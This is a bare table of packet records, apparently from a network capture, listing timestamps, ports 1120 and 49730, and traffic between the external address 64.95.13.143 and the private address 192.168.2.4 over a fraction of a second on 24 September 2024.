Sep 24, 2024 17:46:10.784265041 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.784275055 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.784300089 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.784739971 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.784750938 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.784760952 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.784799099 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.784842014 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.785257101 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.785386086 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.785397053 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.785428047 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.785731077 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.785746098 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.785757065 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.785768032 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.785775900 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.785815001 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.786422014 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.786438942 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.786449909 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.786461115 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.786463976 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.786473036 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.786498070 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.786529064 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.787430048 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.787441969 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.787548065 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.813112974 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.813256979 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.813271046 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.813327074 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.813503027 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.813513994 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.813524008 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.813534975 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.813539028 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.813592911 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.814152002 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.814162970 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.814172983 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.814183950 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.814189911 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.814196110 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.814207077 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.814207077 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.814237118 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.815406084 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.815417051 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.815428019 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.815438032 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.815444946 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.815450907 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.815462112 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.815473080 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.815479994 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.815507889 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.816663027 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.816674948 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.816685915 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.816695929 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.816710949 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.816719055 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.816720963 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.816723108 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.816726923 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.816744089 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.816775084 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.879298925 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.879317999 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.879331112 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.879389048 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.879977942 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.879990101 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.880001068 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.880012989 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.880039930 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.880068064 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.880356073 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.880367994 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.880378962 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.880389929 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.880395889 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.880418062 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.881243944 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.881252050 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.881253958 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.881256104 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.881304979 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.882998943 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.883012056 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.883023024 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.883040905 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.883043051 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.883050919 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.883054972 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.883093119 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.883450985 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.883462906 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.883480072 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.883492947 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.883503914 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.883529902 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.885359049 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.885370970 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.885381937 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.885394096 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.885404110 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.885412931 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.885432005 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.885581970 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.885593891 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.885605097 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.885616064 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.885621071 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.885638952 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.887083054 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.887100935 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.887111902 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.887124062 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.887125969 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.887136936 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.887144089 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.887175083 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.887228966 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.887245893 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.887255907 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.887263060 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.887264967 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.887270927 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.887289047 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.887305021 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.887660980 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.887676954 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.887684107 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.887686968 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.887697935 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.887708902 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.887722015 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.887727976 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.887753010 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.888150930 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.888164043 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.888175011 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.888185978 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.888190985 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.888199091 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.888206959 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.888211966 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.888223886 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.888235092 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.888254881 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.888899088 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.888911009 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.888921976 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.888945103 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.888946056 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.888956070 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.888961077 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.888992071 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.889017105 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.889856100 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.889869928 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.889885902 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.889897108 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.889902115 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.889903069 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.889921904 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.889942884 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.889960051 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.890667915 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.890678883 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.890690088 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.890697002 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.890707016 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.890717983 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.890727997 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.890759945 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.891911030 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.891925097 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.891937017 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.891952991 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.891964912 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.905675888 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.905683041 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.905689001 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.905736923 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.905970097 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.905983925 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.905994892 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.906006098 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.906017065 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.906030893 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.906573057 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.906589985 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.906596899 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.906672001 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.907032967 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.907043934 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.907054901 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.907067060 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.907078028 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.907120943 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.907174110 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.907929897 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.907942057 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.907953978 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.907964945 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.907974958 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.907987118 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.908001900 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.908029079 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.908056974 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.960577965 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.960628986 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.960644960 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.960685968 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.961072922 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.961085081 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.961097002 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.961107969 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.961127043 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.961167097 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.966953039 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.966970921 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.966984034 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.967010021 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.967040062 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.967185974 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.967199087 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.967210054 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.967221022 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.967231989 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.967256069 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.968015909 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.968036890 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.968048096 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.968058109 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.968063116 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.968070030 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.968081951 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.968099117 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.968131065 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.968693972 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.968708992 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.968720913 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.968730927 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.968739033 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.968749046 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.968772888 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.968801975 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.969615936 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.969629049 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.969640017 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.969650984 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.969666004 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.969671965 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.969675064 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.969690084 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.969724894 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.970673084 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.970690012 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.970700026 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.970711946 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.970722914 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.970735073 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.970743895 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.970773935 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.971473932 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.971494913 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.971507072 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.971522093 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.971529007 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.971534014 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.971555948 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.971586943 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.972569942 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.972585917 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.972596884 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.972609043 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.972620010 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.972626925 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.972631931 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.972647905 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.972666025 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.973289013 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.973304987 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.973311901 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.973321915 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.973337889 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.973347902 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.973361015 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.973376036 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.973395109 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.974184036 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.974198103 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.974209070 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.974220037 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.974231958 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.974265099 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.974893093 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.974915981 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.974925995 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.974936962 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.974946022 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.974946976 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.974965096 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.974970102 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.974977016 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.975004911 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.975028992 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.975831985 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.975845098 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.975855112 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.975867033 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.975877047 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.975888014 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.975894928 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.975900888 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.975931883 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.976713896 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.976727009 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.976737022 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.976747990 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.976758003 CEST	49730	1120	192.168.2.4	64.95.13.143
